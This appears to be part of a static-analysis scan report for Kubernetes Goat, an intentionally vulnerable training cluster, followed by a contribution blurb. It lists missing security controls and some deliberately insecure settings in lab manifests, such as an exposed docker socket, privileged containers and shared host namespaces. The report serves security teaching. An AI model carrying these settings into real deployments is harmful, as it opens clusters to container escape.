77CKV_K8S_21/scenarios/batch-check/job.yamlJob.batch-check-job.defaultThe default namespace should not be used
78CKV_K8S_23/scenarios/batch-check/job.yamlJob.batch-check-job.defaultMinimize the admission of root containers
79CKV_K8S_37/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Minimize the admission of containers with capabilities assigned
80CKV_K8S_12/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Memory requests should be set
81CKV_K8S_20/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Containers should not run with allowPrivilegeEscalation
82CKV_K8S_13/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Memory limits should be set
83CKV_K8S_10/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)CPU requests should be set
84CKV_K8S_22/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Use read-only filesystem for containers where possible
85CKV_K8S_28/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Minimize the admission of containers with the NET_RAW capability
86CKV_K8S_30/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Apply security context to your pods and containers
87CKV_K8S_14/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Image Tag should be fixed - not latest or blank
88CKV_K8S_43/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)Image should use digest
89CKV_K8S_11/scenarios/batch-check/job.yamlJob.batch-check-job.default (container 0)CPU limits should be set
90CKV_K8S_31/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
91CKV_K8S_40/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultContainers should run as a high UID to avoid host conflict
92CKV_K8S_29/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultApply security context to your pods and containers
93CKV_K8S_38/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
94CKV_K8S_21/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultThe default namespace should not be used
95CKV_K8S_23/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.defaultMinimize the admission of root containers
96CKV_K8S_21/scenarios/hunger-check/deployment.yamlService.hunger-check-service.defaultThe default namespace should not be used
97CKV_K8S_37/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
98CKV_K8S_8/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Liveness Probe Should be Configured
99CKV_K8S_12/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Memory requests should be set
100CKV_K8S_20/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
101CKV_K8S_13/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Memory limits should be set
102CKV_K8S_10/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)CPU requests should be set
103CKV_K8S_22/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Use read-only filesystem for containers where possible
104CKV_K8S_9/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Readiness Probe Should be Configured
105CKV_K8S_28/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
106CKV_K8S_30/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Apply security context to your pods and containers
107CKV_K8S_14/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Image Tag should be fixed - not latest or blank
108CKV_K8S_43/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)Image should use digest
109CKV_K8S_11/scenarios/hunger-check/deployment.yamlDeployment.hunger-check-deployment.default (container 0)CPU limits should be set
110CKV_K8S_31/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
111CKV_K8S_40/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultContainers should run as a high UID to avoid host conflict
112CKV_K8S_29/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultApply security context to your pods and containers
113CKV_K8S_38/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
114CKV_K8S_21/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultThe default namespace should not be used
115CKV_K8S_23/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.defaultMinimize the admission of root containers
116CKV_K8S_21/scenarios/poor-registry/deployment.yamlService.poor-registry-service.defaultThe default namespace should not be used
117CKV_K8S_37/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
118CKV_K8S_8/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Liveness Probe Should be Configured
119CKV_K8S_12/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Memory requests should be set
120CKV_K8S_20/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
121CKV_K8S_10/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)CPU requests should be set
122CKV_K8S_22/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Use read-only filesystem for containers where possible
123CKV_K8S_9/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Readiness Probe Should be Configured
124CKV_K8S_28/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
125CKV_K8S_30/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Apply security context to your pods and containers
126CKV_K8S_14/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Image Tag should be fixed - not latest or blank
127CKV_K8S_43/scenarios/poor-registry/deployment.yamlDeployment.poor-registry-deployment.default (container 0)Image should use digest
128CKV_K8S_31/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
129CKV_K8S_40/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultContainers should run as a high UID to avoid host conflict
130CKV_K8S_17/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultContainers should not share the host process ID namespace
131CKV_K8S_29/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultApply security context to your pods and containers
132CKV_K8S_38/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultEnsure that Service Account Tokens are only mounted where necessary
133CKV_K8S_21/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultThe default namespace should not be used
134CKV_K8S_23/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.defaultMinimize the admission of root containers
135CKV_K8S_37/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Minimize the admission of containers with capabilities assigned
136CKV_K8S_12/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Memory requests should be set
137CKV_K8S_20/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Containers should not run with allowPrivilegeEscalation
138CKV_K8S_13/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Memory limits should be set
139CKV_K8S_10/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)CPU requests should be set
140CKV_K8S_22/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Use read-only filesystem for containers where possible
141CKV_K8S_28/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Minimize the admission of containers with the NET_RAW capability
142CKV_K8S_30/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Apply security context to your pods and containers
143CKV_K8S_14/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Image Tag should be fixed - not latest or blank
144CKV_K8S_43/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)Image should use digest
145CKV_K8S_11/scenarios/kube-bench-security/master-job.yamlJob.kube-bench-master.default (container 0)CPU limits should be set
146CKV_K8S_31/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
147CKV_K8S_40/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultContainers should run as a high UID to avoid host conflict
148CKV_K8S_17/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultContainers should not share the host process ID namespace
149CKV_K8S_29/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultApply security context to your pods and containers
150CKV_K8S_38/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultEnsure that Service Account Tokens are only mounted where necessary
151CKV_K8S_21/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultThe default namespace should not be used
152CKV_K8S_23/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.defaultMinimize the admission of root containers
153CKV_K8S_37/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Minimize the admission of containers with capabilities assigned
154CKV_K8S_12/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Memory requests should be set
155CKV_K8S_20/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Containers should not run with allowPrivilegeEscalation
156CKV_K8S_13/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Memory limits should be set
157CKV_K8S_10/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)CPU requests should be set
158CKV_K8S_22/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Use read-only filesystem for containers where possible
159CKV_K8S_28/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Minimize the admission of containers with the NET_RAW capability
160CKV_K8S_30/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Apply security context to your pods and containers
161CKV_K8S_14/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Image Tag should be fixed - not latest or blank
162CKV_K8S_43/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)Image should use digest
163CKV_K8S_11/scenarios/kube-bench-security/node-job.yamlJob.kube-bench-node.default (container 0)CPU limits should be set
164CKV_K8S_31/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
165CKV_K8S_27/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultDo not expose the docker daemon socket to containers
166CKV_K8S_40/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultContainers should run as a high UID to avoid host conflict
167CKV_K8S_29/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultApply security context to your pods and containers
168CKV_K8S_38/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
169CKV_K8S_21/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultThe default namespace should not be used
170CKV_K8S_23/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.defaultMinimize the admission of root containers
171CKV_K8S_21/scenarios/health-check/deployment.yamlService.health-check-service.defaultThe default namespace should not be used
172CKV_K8S_37/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
173CKV_K8S_8/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Liveness Probe Should be Configured
174CKV_K8S_12/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Memory requests should be set
175CKV_K8S_20/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
176CKV_K8S_10/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)CPU requests should be set
177CKV_K8S_16/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Container should not be privileged
178CKV_K8S_22/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Use read-only filesystem for containers where possible
179CKV_K8S_9/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Readiness Probe Should be Configured
180CKV_K8S_28/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
181CKV_K8S_14/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Image Tag should be fixed - not latest or blank
182CKV_K8S_43/scenarios/health-check/deployment.yamlDeployment.health-check-deployment.default (container 0)Image should use digest
183CKV_K8S_31/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
184CKV_K8S_40/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultContainers should run as a high UID to avoid host conflict
185CKV_K8S_29/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultApply security context to your pods and containers
186CKV_K8S_38/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
187CKV_K8S_21/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultThe default namespace should not be used
188CKV_K8S_23/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.defaultMinimize the admission of root containers
189CKV_K8S_21/scenarios/internal-proxy/deployment.yamlService.internal-proxy-api-service.defaultThe default namespace should not be used
190CKV_K8S_21/scenarios/internal-proxy/deployment.yamlService.internal-proxy-info-app-service.defaultThe default namespace should not be used
191CKV_K8S_37/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
192CKV_K8S_8/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Liveness Probe Should be Configured
193CKV_K8S_20/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
194CKV_K8S_22/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Use read-only filesystem for containers where possible
195CKV_K8S_9/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Readiness Probe Should be Configured
196CKV_K8S_28/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
197CKV_K8S_30/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Apply security context to your pods and containers
198CKV_K8S_14/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Image Tag should be fixed - not latest or blank
199CKV_K8S_43/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 0)Image should use digest
200CKV_K8S_37/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Minimize the admission of containers with capabilities assigned
201CKV_K8S_8/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Liveness Probe Should be Configured
202CKV_K8S_20/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Containers should not run with allowPrivilegeEscalation
203CKV_K8S_22/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Use read-only filesystem for containers where possible
204CKV_K8S_9/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Readiness Probe Should be Configured
205CKV_K8S_28/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Minimize the admission of containers with the NET_RAW capability
206CKV_K8S_30/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Apply security context to your pods and containers
207CKV_K8S_14/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Image Tag should be fixed - not latest or blank
208CKV_K8S_43/scenarios/internal-proxy/deployment.yamlDeployment.internal-proxy-deployment.default (container 1)Image should use digest
209CKV_K8S_21/scenarios/system-monitor/deployment.yamlSecret.goatvault.defaultThe default namespace should not be used
210CKV_K8S_31/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultEnsure that the seccomp profile is set to docker/default or runtime/default
211CKV_K8S_40/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should run as a high UID to avoid host conflict
212CKV_K8S_19/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host network namespace
213CKV_K8S_17/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host process ID namespace
214CKV_K8S_18/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultContainers should not share the host IPC namespace
215CKV_K8S_29/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultApply security context to your pods and containers
216CKV_K8S_38/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultEnsure that Service Account Tokens are only mounted where necessary
217CKV_K8S_21/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultThe default namespace should not be used
218CKV_K8S_23/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.defaultMinimize the admission of root containers
219CKV_K8S_21/scenarios/system-monitor/deployment.yamlService.system-monitor-service.defaultThe default namespace should not be used
220CKV_K8S_37/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Minimize the admission of containers with capabilities assigned
221CKV_K8S_8/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Liveness Probe Should be Configured
222CKV_K8S_12/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Memory requests should be set
223CKV_K8S_20/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Containers should not run with allowPrivilegeEscalation
224CKV_K8S_10/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)CPU requests should be set
225CKV_K8S_16/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Container should not be privileged
226CKV_K8S_22/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Use read-only filesystem for containers where possible
227CKV_K8S_9/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Readiness Probe Should be Configured
228CKV_K8S_35/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Prefer using secrets as files over secrets as environment variables
229CKV_K8S_28/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Minimize the admission of containers with the NET_RAW capability
230CKV_K8S_14/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Image Tag should be fixed - not latest or blank
231CKV_K8S_43/scenarios/system-monitor/deployment.yamlDeployment.system-monitor-deployment.default (container 0)Image should use digest

Getting Involved

First of all thank you so much for showing interest in Kubernetes Goat, we really appreciate it.

Here are some of the ways you can contribute to the Kubernetes-Goat

  • By providing your valuable feedback. Your honest feedback is always appreciated, no matter if it is positive or negative :)

  • By contributing to development of platform and scenarios

  • Improving the documentation/notes

  • By spreading the word and sharing with community, friends and colleagues

Follow in Social Media